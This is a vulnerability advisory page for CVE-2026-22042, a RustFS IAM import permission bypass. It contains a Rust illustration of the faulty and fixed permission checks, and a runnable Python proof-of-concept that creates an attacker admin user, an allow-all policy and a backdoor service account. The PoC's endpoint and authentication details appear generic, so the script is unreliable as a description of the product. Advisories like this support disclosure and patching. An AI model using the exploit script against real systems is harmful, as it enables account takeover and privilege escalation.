Security Vulnerability Report
CVE-2026-22042 CVSS 8.8 HIGH

CVE-2026-22042

Published: 2026-01-08 15:15:45
Last Modified: 2026-01-15 21:11:34

Description

RustFS is a distributed object storage system built in Rust. Prior to version 1.0.0-alpha.79, the `ImportIam` admin API validates permissions using `ExportIAMAction` instead of `ImportIAMAction`, allowing a principal with export-only IAM permissions to perform import operations. Since importing IAM data performs privileged write actions (creating/updating users, groups, policies, and service accounts), this can lead to unauthorized IAM modification and privilege escalation. Version 1.0.0-alpha.79 fixes the issue.
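The authorization mistake the description names, as an added illustration that is not RustFS's own code (the `AdminAction`, `Principal` and `import_iam_*` names are hypothetical): a handler gated on the export action admits a principal that holds only the export permission, while the corrected gate checks the action that matches the write it is about to perform.

```rust
// Hypothetical types illustrating the CWE-863 pattern; not RustFS's own code or API.
use std::collections::HashSet;
/// Admin actions a policy can grant (hypothetical subset).
#[derive(Clone, Copy, PartialEq, Eq, Hash, Debug)]
pub enum AdminAction {
    ExportIAMAction,
    ImportIAMAction,
}

/// A caller's effective permission set (constructed for the example).
pub struct Principal {
    pub name: String,
    pub allowed: HashSet<AdminAction>,
}
impl Principal {
    pub fn can(&self, action: AdminAction) -> bool {
        self.allowed.contains(&action)
    }
}

/// Vulnerable gate: the import handler asks for the *export* permission,
/// so an export-only principal is let through to write IAM state.
pub fn import_iam_vulnerable(p: &Principal) -> Result<(), String> {
    if !p.can(AdminAction::ExportIAMAction) {
        return Err(format!("{}: access denied", p.name));
    }
    Ok(()) // privileged writes to users/groups/policies would follow here
}

/// Fixed gate: the permission checked matches the operation performed.
pub fn import_iam_fixed(p: &Principal) -> Result<(), String> {
    if !p.can(AdminAction::ImportIAMAction) {
        return Err(format!("{}: access denied", p.name));
    }
    Ok(())
}

/// Export-only principal, as the advisory describes (constructed sample).
pub fn export_only_principal() -> Principal {
    Principal {
        name: "auditor".to_string(),
        allowed: [AdminAction::ExportIAMAction].iter().copied().collect(),
    }
}
fn main() {
    let auditor = export_only_principal();
    println!("vulnerable gate: {:?}", import_iam_vulnerable(&auditor)); // Ok(())
    println!("fixed gate:      {:?}", import_iam_fixed(&auditor)); // Err("auditor: access denied")
}
```

A regression test of this shape (export-only principal must be denied by the import handler) is the check that would have caught the mismatch before release.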

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE
RustFS < 1.0.0-alpha.79

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-22042 RustFS ImportIam Permission Bypass PoC
Note: This is a proof-of-concept demonstrating the vulnerability.
Use only for authorized security testing.
"""
import requests
import json
import sys


def exploit_rustfs(target_url, access_key, secret_key):
    """
    Exploit the ImportIam permission bypass vulnerability
    """
    # Target endpoint
    endpoint = f"{target_url}/api/v1/admin/import-iam"

    # Malicious IAM data to import
    malicious_iam_data = {
        "users": [
            {
                "username": "attacker_admin",
                "password": "P@ssw0rd123!",
                "policy": "AdminPolicy",
                "groups": ["Administrators"]
            }
        ],
        "groups": [
            {
                "name": "Administrators",
                "members": ["attacker_admin"]
            }
        ],
        "policies": [
            {
                "name": "AdminPolicy",
                "document": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Action": "*",
                            "Resource": "*"
                        }
                    ]
                }
            }
        ],
        "serviceAccounts": [
            {
                "name": "malicious_service",
                "accessKey": "AKIA_NEW_KEY",
                "secretKey": "secret_key_123456"
            }
        ]
    }

    headers = {
        "Content-Type": "application/json",
        "X-Access-Key": access_key,
        "X-Secret-Key": secret_key
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Endpoint: {endpoint}")
    print("[*] Sending malicious IAM data...")

    try:
        response = requests.post(endpoint, headers=headers, json=malicious_iam_data, timeout=30)
        if response.status_code == 200:
            print("[+] SUCCESS: IAM data imported successfully!")
            print("[+] Attacker now has admin access to RustFS")
            print("[*] Created user: attacker_admin with AdminPolicy")
            print("[*] Created service account: malicious_service")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2026-22042.py <target_url> <access_key> <secret_key>")
        print("Example: python3 cve-2026-22042.py https://rustfs.example.com admin_key secret_key")
        sys.exit(1)
    target = sys.argv[1]
    access_key = sys.argv[2]
    secret_key = sys.argv[3]
    exploit_rustfs(target, access_key, secret_key)
```

References

Raw JSON Data
